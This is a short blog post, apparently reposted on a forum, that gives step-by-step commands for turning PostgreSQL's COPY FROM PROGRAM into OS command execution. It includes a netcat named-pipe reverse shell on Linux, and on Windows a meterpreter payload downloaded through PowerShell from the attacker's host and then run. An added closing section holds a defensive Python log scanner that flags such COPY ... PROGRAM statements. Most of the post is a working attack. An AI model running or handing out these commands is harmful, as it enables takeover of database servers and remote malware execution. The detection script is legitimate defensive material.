Nytro

OS Command Execution in PostgreSQL >= 9.3


Linux

On attacker's machine:

nc -lvp 55555

On machine with PostgreSQL:

postgres=# create table evil (a text);

postgres=# copy evil from program 'mknod backpipe p; nc 192.168.234.138 55555 0<backpipe | /bin/bash 1>backpipe';

[Image: linux.png]

Getting backconnect:

[Image: netcat.png]

Windows

On attacker's machine:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.234.138 LPORT=443 X > m.exe

msfconsole

use multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.234.138

set LPORT 443

exploit

On machine with PostgreSQL:

postgres=# create table evil (a text);

postgres=# copy evil from program 'powershell.exe -Command "& {(New-Object Net.WebClient).DownloadFile(\"http://192.168.234.138/m.exe\", \"C:\windows\temp\m.exe\")}"';

postgres=# copy evil from program 'C:\windows\temp\m.exe';

[Image: windows_down_run.png]

Getting backconnect:

[Image: meterpreter.png]

Posted by dsrbr at 10:08 AM

Source: http://dsrbr.blogspot.ru/
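A detection-side counterpart to the statements in the post above, as an added example that is not part of the original post or the linked blog: it scans PostgreSQL server logs for COPY ... PROGRAM statements and reports who ran which command. It goes beyond the post by also matching COPY ... TO PROGRAM. Assumptions: statement logging is on (log_statement = 'all', or 'mod' for the FROM direction), the stderr log format with log_line_prefix '%m [%p] %u@%d ', and all log lines below are constructed.

```python
import re
from itertools import count

# Constructed log lines; continuation lines of a multi-line statement start with a tab.
SAMPLE_LOG = (
    "2024-01-01 10:00:01 UTC [411] app@shop LOG:  statement: "
    "INSERT INTO notes VALUES ('copy t from program ''id''');\n"
    "2024-01-01 10:00:03 UTC [412] postgres@postgres LOG:  statement: "
    "copy evil from program 'id';\n"
    "2024-01-01 10:00:04 UTC [413] etl@shop LOG:  statement: "
    "COPY sales FROM '/srv/import/sales.csv' WITH (FORMAT csv);\n"
    "2024-01-01 10:00:05 UTC [414] postgres@postgres LOG:  statement: "
    "COPY (SELECT 1) TO\n\tPROGRAM E'gzip > /tmp/out.gz';\n"
)

ENTRY = re.compile(r"\[(\d+)\] (\S+)@(\S+) LOG:  (?:statement|execute [^:]*): (.*)", re.S)
# SQL string literals: E'...' allows backslash escapes, plain '...' only doubled quotes.
LITERAL = re.compile(r"\b[eE]'(?:[^'\\]|\\.|'')*'|'(?:[^']|'')*'", re.S)
COPY_PROGRAM = re.compile(r"\bcopy\b[^;]*?\b(from|to)\s+program\s+\x00(\d+)\x00", re.I | re.S)


def log_entries(text):
    """Join tab-indented continuation lines onto the entry they belong to."""
    entries = []
    for line in text.splitlines():
        if line.startswith("\t") and entries:
            entries[-1] += "\n" + line[1:]
        else:
            entries.append(line)
    return entries


def find_copy_program(text):
    """Return (pid, user, database, direction, command literal) per COPY ... PROGRAM."""
    hits = []
    for m in filter(None, map(ENTRY.search, log_entries(text))):
        pid, user, db, sql = m.groups()
        # Mask literals so keywords inside strings (first sample line) never match.
        literals, n = LITERAL.findall(sql), count()
        masked = LITERAL.sub(lambda _: "\x00%d\x00" % next(n), sql)
        for hit in COPY_PROGRAM.finditer(masked):
            hits.append((int(pid), user, db, hit.group(1).upper(), literals[int(hit.group(2))]))
    return hits


if __name__ == "__main__":
    print(*find_copy_program(SAMPLE_LOG), sep="\n")
```

COPY ... PROGRAM is only available to superusers (and, from PostgreSQL 11, members of pg_execute_server_program), so a hit from any role outside the expected admin or ETL accounts merits review.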
